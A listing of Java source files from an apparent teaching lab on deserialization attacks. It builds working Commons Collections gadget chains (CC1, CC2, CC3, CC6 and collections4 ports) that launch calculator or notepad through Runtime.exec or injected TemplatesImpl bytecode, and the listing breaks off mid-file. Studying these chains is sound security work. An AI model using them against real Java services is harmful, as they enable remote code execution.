 * ({@code TransformedMap.transformedMap} instead of {@code decorate}). Same payload
 * (Runtime.exec("calc.exe")), same JDK dependency on AnnotationInvocationHandler.readObject —
 * run only in a throw-away VM.
 *
 * NOTE(review): the README (chapter 16) points at the fix that landed in later 4.x releases;
 * expect newer collections4 builds to refuse deserializing these functors unless explicitly
 * re-enabled — confirm the version on the target.
 */
public class CommonsCollections1For4 {
    public static void main(String[] args) throws Exception {
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec("calc.exe").
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { "calc.exe" }),
        };

        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        // "value" = the single element of Retention; see CommonsCollections1.
        innerMap.put("value", "xxxx");
        // collections4 factory: key transformer null, value transformer = chain.
        Map outerMap = TransformedMap.transformedMap(innerMap, null, transformerChain);

        // Non-public constructor -> reflection.
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(handler);
        oos.close();

        System.out.println(barr);
        // Local trigger through an unfiltered ObjectInputStream.
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Comparator;
import java.util.PriorityQueue;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.comparators.TransformingComparator;

/**
 * Lab code: the CommonsCollections2 chain (commons-collections4), built and then deserialized
 * in this same JVM.
 *
 * Chain: PriorityQueue (readObject re-heapifies -> comparator.compare; JDK behaviour, not shown
 * here) -> TransformingComparator applies its Transformer to the compared elements ->
 * ChainedTransformer -> Runtime.exec("calc.exe"). No AnnotationInvocationHandler involved, so it
 * does not depend on that JDK internal. Run only in a throw-away VM.
 */
public class CommonsCollections2 {
    /**
     * Writes a private field reflectively.
     *
     * @param obj       target instance
     * @param fieldName name of a field declared on obj's runtime class (inherited fields are not found)
     * @param value     new value
     * @throws Exception NoSuchFieldException / IllegalAccessException from the reflection calls
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // Harmless placeholder chain used while the queue is being populated, so that
        // queue.add() -> compare() in THIS JVM does not run the real chain.
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec("calc.exe").
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { "calc.exe" }),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Comparator comparator = new TransformingComparator(transformerChain);

        // Two elements so that the queue has something to compare when it is re-heapified.
        PriorityQueue queue = new PriorityQueue(2, comparator);
        queue.add(1);
        queue.add(2);

        // Order matters: the real transformers are swapped in only after the adds, so they exist
        // only in the serialized form and fire at deserialization time.
        setFieldValue(transformerChain, "iTransformers", transformers);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        System.out.println(barr);
        // Local trigger through an unfiltered ObjectInputStream.
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Comparator;
import java.util.PriorityQueue;

/**
 * Lab code: CommonsCollections2 with a TemplatesImpl payload instead of a Runtime.exec chain.
 *
 * Chain: PriorityQueue (readObject re-heapifies -> comparator.compare; JDK behaviour, not shown
 * here) -> TransformingComparator -> a single InvokerTransformer whose method name is switched
 * to "newTransformer" -> TemplatesImpl.newTransformer() defines and instantiates
 * evil.EvilTemplatesImpl. Only one functor and no ChainedTransformer are needed.
 * Run only in a throw-away VM.
 */
public class CommonsCollections2TemplatesImpl {
    /**
     * Writes a private field reflectively.
     *
     * @param obj       target instance
     * @param fieldName name of a field declared on obj's runtime class (inherited fields are not found)
     * @param value     new value
     * @throws Exception NoSuchFieldException / IllegalAccessException from the reflection calls
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    /**
     * Reads evil.EvilTemplatesImpl's class bytes from the classpath via javassist.
     * (The name is a typo of "getBytecode", kept for compatibility.)
     *
     * @return the raw .class bytes
     * @throws Exception javassist NotFoundException / IOException / CannotCompileException
     */
    protected static byte[] getBytescode() throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName());
        return clazz.toBytecode();
    }

    public static void main(String[] args) throws Exception {
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // Harmless placeholder method ("toString") while the queue is populated, so that
        // queue.add() -> compare() in THIS JVM does not call newTransformer().
        Transformer transformer = new InvokerTransformer("toString", null, null);
        Comparator comparator = new TransformingComparator(transformer);
        PriorityQueue queue = new PriorityQueue(2, comparator);
        queue.add(obj);
        queue.add(obj);

        // Order matters: only after the adds is the invoked method renamed, so
        // "newTransformer" exists only in the serialized form and fires at deserialization.
        setFieldValue(transformer, "iMethodName", "newTransformer");

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        System.out.println(barr);
        // Local trigger through an unfiltered ObjectInputStream.
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;

/**
 * Lab code: the (simplified) CommonsCollections3 chain, built and then deserialized in this
 * same JVM.
 *
 * Same AnnotationInvocationHandler + TransformedMap entry point as CommonsCollections1, but
 * the chain contains no InvokerTransformer — the README says that is the point of CC3, since
 * InvokerTransformer is what blacklist-style filters typically key on. Instead
 * InstantiateTransformer constructs a TrAXFilter from the TemplatesImpl; TrAXFilter's
 * constructor calls newTransformer() on it (JDK internals, not shown here), which defines and
 * instantiates evil.EvilTemplatesImpl. Run only in a throw-away VM.
 */
public class CommonsCollections3 {
    /**
     * Writes a private field reflectively.
     *
     * @param obj       target instance
     * @param fieldName name of a field declared on obj's runtime class (inherited fields are not found)
     * @param value     new value
     * @throws Exception NoSuchFieldException / IllegalAccessException from the reflection calls
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // TemplatesImpl carrying the class bytes of evil.EvilTemplatesImpl (read via javassist).
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{
                ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode()
        });
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // Harmless placeholder chain used while the gadget is assembled in THIS JVM.
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        // TrAXFilter.class -> new TrAXFilter((Templates) obj): no InvokerTransformer anywhere.
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[] { Templates.class },
                        new Object[] { obj })
        };

        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        // "value" = the single element of Retention; see CommonsCollections1.
        innerMap.put("value", "xxxx");
        // No key transformer; the value transformer is the chain.
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

        // Non-public constructor -> reflection. Same JDK-version caveat as CommonsCollections1:
        // this relies on AnnotationInvocationHandler.readObject calling setValue on the entries.
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);

        // Order matters: the real transformers are swapped in only now, so they exist only in
        // the serialized form and fire at deserialization time.
        setFieldValue(transformerChain, "iTransformers", transformers);
        // ==================
        // Build the serialized payload
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(handler);
        oos.close();

        // Trigger it locally for testing (unfiltered ObjectInputStream)
        // System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import 
org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;

/**
 * CommonsCollections3 gadget ported to commons-collections4 (package org.apache.commons.collections4,
 * factory method TransformedMap.transformedMap instead of decorate). Same chain as CommonsCollections3:
 * AnnotationInvocationHandler.readObject() -> TransformedMap -> ChainedTransformer
 * -> TrAXFilter(templates) -> TemplatesImpl.newTransformer() -> load evil.EvilTemplatesImpl.
 *
 * WARNING: main() deserializes the payload in-process, executing the embedded class locally.
 */
public class CommonsCollections3For4 {
    /**
     * Writes {@code value} into the field {@code fieldName} declared directly on obj's class,
     * bypassing access checks (the gadget classes expose no setters for these fields).
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // Payload carrier; _tfactory is transient and only matters for the local test below.
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{
                ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode()
        });
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // Placeholder chain while wiring; the real transformers are swapped in below so the
        // payload cannot fire in this process during construction.
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        // Real chain: TrAXFilter.class -> new TrAXFilter(obj)
        // (NOTE(review): relies on TrAXFilter's constructor calling newTransformer()).
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[] { Templates.class },
                        new Object[] { obj })
        };

        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        // NOTE(review): key must name a member of the annotation type used below (Retention.value).
        innerMap.put("value", "xxxx");
        // collections4 spelling of decorate(); value transformer only.
        Map outerMap = TransformedMap.transformedMap(innerMap, null, transformerChain);

        // Deserialization entry point; non-public class, hence reflection.
        // NOTE(review): this readObject() path was hardened in later JDK 8 updates.
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);

        // Arm the chain now that construction is finished.
        setFieldValue(transformerChain, "iTransformers", transformers);
        // ==================
        // Build the serialized payload
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(handler);
        oos.close();

        // Trigger locally for testing (executes the embedded class in this JVM)
        // System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

/**
 * Simplified CommonsCollections6 gadget (commons-collections 3.x):
 * HashMap.readObject() -> TiedMapEntry.hashCode() -> LazyMap.get() -> ChainedTransformer
 * -> Runtime.getRuntime().exec("calc.exe").
 * The trigger is HashMap rehashing, which does not depend on AnnotationInvocationHandler and
 * therefore keeps working on JDKs where the CommonsCollections1/3 entry point was closed.
 *
 * WARNING: main() deserializes the payload in-process; the command is Windows-specific.
 */
public class CommonsCollections6 {
    public static void main(String[] args) throws Exception {
        // Placeholder chain while wiring; the real one is swapped in below.
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        // Runtime is not Serializable, so it is reached reflectively:
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec("calc.exe").
        // The trailing ConstantTransformer(1) replaces the Process result with a harmless Integer.
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { "calc.exe" }),
                new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        // Instead of the HashSet used by the original CommonsCollections6 chain, use a HashMap directly
        Map innerMap = new HashMap();
        // LazyMap runs the transformer as a factory for keys that are absent.
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        // Hashing tme here already calls TiedMapEntry.hashCode() -> getValue() -> LazyMap.get("keykey"),
        // which runs the (still harmless) chain and stores its result under "keykey".
        expMap.put(tme, "valuevalue");

        // Remove that cached entry again, otherwise the key is present on the target and the
        // factory (the armed chain) would not run when the HashMap is rebuilt in readObject().
        outerMap.remove("keykey");

        // Arm the chain only now, after all wiring is done.
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        // ==================
        // Build the serialized payload
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        // Trigger locally for testing (dumps the raw payload, then executes it in this JVM)
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import org.apache.commons.collections4.map.LazyMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

/**
 * Simplified CommonsCollections6 gadget ported to commons-collections4
 * (LazyMap.lazyMap instead of decorate). Same chain as CommonsCollections6:
 * HashMap.readObject() -> TiedMapEntry.hashCode() -> LazyMap.get() -> ChainedTransformer
 * -> Runtime.getRuntime().exec("calc.exe").
 *
 * WARNING: main() deserializes the payload in-process; the command is Windows-specific.
 */
public class CommonsCollections6For4 {
    public static void main(String[] args) throws Exception {
        // Placeholder chain while wiring; the real one is swapped in below.
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        // Runtime reached reflectively (Runtime itself is not Serializable);
        // the trailing ConstantTransformer(1) replaces the Process result with an Integer.
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { "calc.exe" }),
                new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        // Instead of the HashSet used by the original CommonsCollections6 chain, use a HashMap directly
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.lazyMap(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        // Hashing tme runs the (still harmless) chain once and caches "keykey" in innerMap.
        expMap.put(tme, "valuevalue");

        // Remove the cached key so the factory runs again when the target rebuilds the HashMap.
        outerMap.remove("keykey");

        // Arm the chain only now, after all wiring is done.
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        // ==================
        // Build the serialized payload
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        // Trigger locally for testing (dumps the raw payload, then executes it in this JVM)
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

/**
 * CommonsCollections6 variant whose ChainedTransformer runs two commands in sequence
 * ("calc.exe", then "notepad.exe"). Because ChainedTransformer feeds each result into the
 * next transformer, the second command simply restarts from ConstantTransformer(Runtime.class),
 * ignoring the Process returned by the first exec().
 *
 * WARNING: main() deserializes the payload in-process; the commands are Windows-specific.
 */
public class CommonsCollections6Multiple {
    public static void main(String[] args) throws Exception {
        // Placeholder chain while wiring; the real one is swapped in below.
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        // Two back-to-back Runtime.getRuntime().exec(...) sequences, then a harmless Integer result.
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { "calc.exe" }),
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { "notepad.exe" }),
                new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        // Instead of the HashSet used by the original CommonsCollections6 chain, use a HashMap directly
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        // Hashing tme runs the (still harmless) chain once and caches "keykey" in innerMap.
        expMap.put(tme, "valuevalue");

        // Remove the cached key so the factory runs again when the target rebuilds the HashMap.
        outerMap.remove("keykey");

        // Arm the chain only now, after all wiring is done.
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        // ==================
        // Build the serialized payload
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        // Trigger locally for testing (dumps the raw payload, then executes it in this JVM)
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

/**
 * Minimal in-process demonstration of the Transformer primitive: a put() into a TransformedMap
 * runs the ChainedTransformer on the value. No serialization is involved here, which is why a
 * live Runtime instance can be used (java.lang.Runtime is not Serializable, so the serializable
 * gadgets reach it reflectively instead).
 *
 * WARNING: running main() launches the macOS Calculator on this machine.
 */
public class CommonsCollectionsIntro {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.getRuntime()),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}),
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innerMap = new HashMap();
        // Value transformer only; the key transformer is null.
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        // Trigger: the value is passed through the chain on insertion.
        outerMap.put("test", "xxxx");
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import org.apache.commons.collections.Transformer;

import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

/**
 * In-process demonstration of TemplatesImpl as a bytecode loader:
 * TransformedMap.put() -> ChainedTransformer -> ConstantTransformer(templates)
 * -> InvokerTransformer("newTransformer") -> TemplatesImpl.newTransformer(), which defines
 * the class in _bytecodes and runs it. No serialization is involved.
 */
public class CommonsCollectionsIntro2 {
    /**
     * Writes {@code value} into the field {@code fieldName} declared directly on obj's class,
     * bypassing access checks (TemplatesImpl has no setters for these fields).
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // source: bytecodes/HelloTemplateImpl.java
        // NOTE(review): the Base64 literal was elided from this listing; the same class bytes
        // appear inline in TemplatesImplDeserialization.
        byte[] code = Base64.decodeBase64("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");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        // _tfactory is transient on TemplatesImpl; needed here because newTransformer() runs in this JVM.
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(obj),
                new InvokerTransformer("newTransformer", null, null)
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innerMap = new HashMap();
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        // Trigger: the value is passed through the chain on insertion.
        outerMap.put("test", "xxxx");
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.TransformedMap;
import org.apache.commons.collections.Transformer;

import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

/**
 * In-process demonstration of the InvokerTransformer-free variant used by CommonsCollections3:
 * TransformedMap.put() -> ChainedTransformer -> ConstantTransformer(TrAXFilter.class)
 * -> InstantiateTransformer -> new TrAXFilter(templates) -> TemplatesImpl.newTransformer().
 * No serialization is involved.
 */
public class CommonsCollectionsIntro3 {
    /**
     * Writes {@code value} into the field {@code fieldName} declared directly on obj's class,
     * bypassing access checks (TemplatesImpl has no setters for these fields).
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // source: bytecodes/HelloTemplateImpl.java
        // NOTE(review): the Base64 literal was elided from this listing; the same class bytes
        // appear inline in TemplatesImplDeserialization.
        byte[] code = Base64.decodeBase64("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");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // NOTE(review): relies on TrAXFilter's constructor calling newTransformer() on the Templates argument.
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[] { Templates.class },
                        new Object[] { obj })
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innerMap = new HashMap();
